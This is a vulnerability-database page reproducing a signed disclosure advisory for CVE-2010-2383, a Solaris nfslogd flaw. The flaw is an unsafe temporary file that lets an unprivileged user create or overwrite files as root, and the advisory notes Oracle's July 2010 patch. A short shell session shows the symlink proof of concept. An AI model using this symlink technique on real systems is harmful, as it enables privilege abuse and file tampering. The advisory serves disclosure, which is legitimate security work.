Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2010-2383

Publish Date: 21 Jul 2010

Source

                							

                -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Below is the full disclosure information for CVE-2010-2383.  It was
reported to security-alert@sun.com on 29 December, 2009 and assigned Sun
bug 6913655.

This vulnerability was addressed by Sun/Oracle in the July 2010 Critical
Patch Update
(http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2010.html).

- ------
This one is with nfslogd which allows an unprivileged
user to create/overwrite a file as root:

Don't Panic! # ls -dl /etc/oops
/etc/oops: No such file or directory
Don't Panic! # ls -dl /tmp/.nfslogd.pid
lrwxrwxrwx   1 nobody   nobody         9 Dec 29 21:24 /tmp/.nfslogd.pid
- -&gt; /etc/oops
Don't Panic! # id
uid=0(root) gid=0(root)
Don't Panic! # /usr/lib/nfs/nfslogd
Don't Panic! # ls -dl /etc/oops
- -rw-------   1 root     root           4 Dec 29 21:25 /etc/oops

- ------

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.3 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTEUK12KGA6cQSpZSAQKDmgf+Khyu8Mq5rk4wKHUGQm4NCZOvC75ilW2e
Nr9dw/YEEDIZZkaGHRRtPD9pBgnrdCbP/Pvt6wSYyr+JOLYCO1BGGFA36eenTgzI
lbpDuFDgpVO4+DPb5TslS1MYkLYYFh+S9l0zzdYGVvAbURabp35VW852O2SHY7Pg
ZsUjRUrbSMIPUcVq024CLtro2VCJPiZ9o691ChpNlkdCTdtS6PUCllwQazz/2UFO
Gf21llPnO7kkQP7zbjbTITx9cjx6hYOxKbfLtrupxjtnXHRIjts0ToFxUYnT5eWD
3I/1m8/VjnqQSIY7nytcIj+nZG1z7e/zhOmdE54wRcpQzONYngNcWA==
=ojGd
-----END PGP SIGNATURE-----
<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Solaris nfslogd Unsafe Use Of Temporary Files

Vulmon Search

About

Products

Connect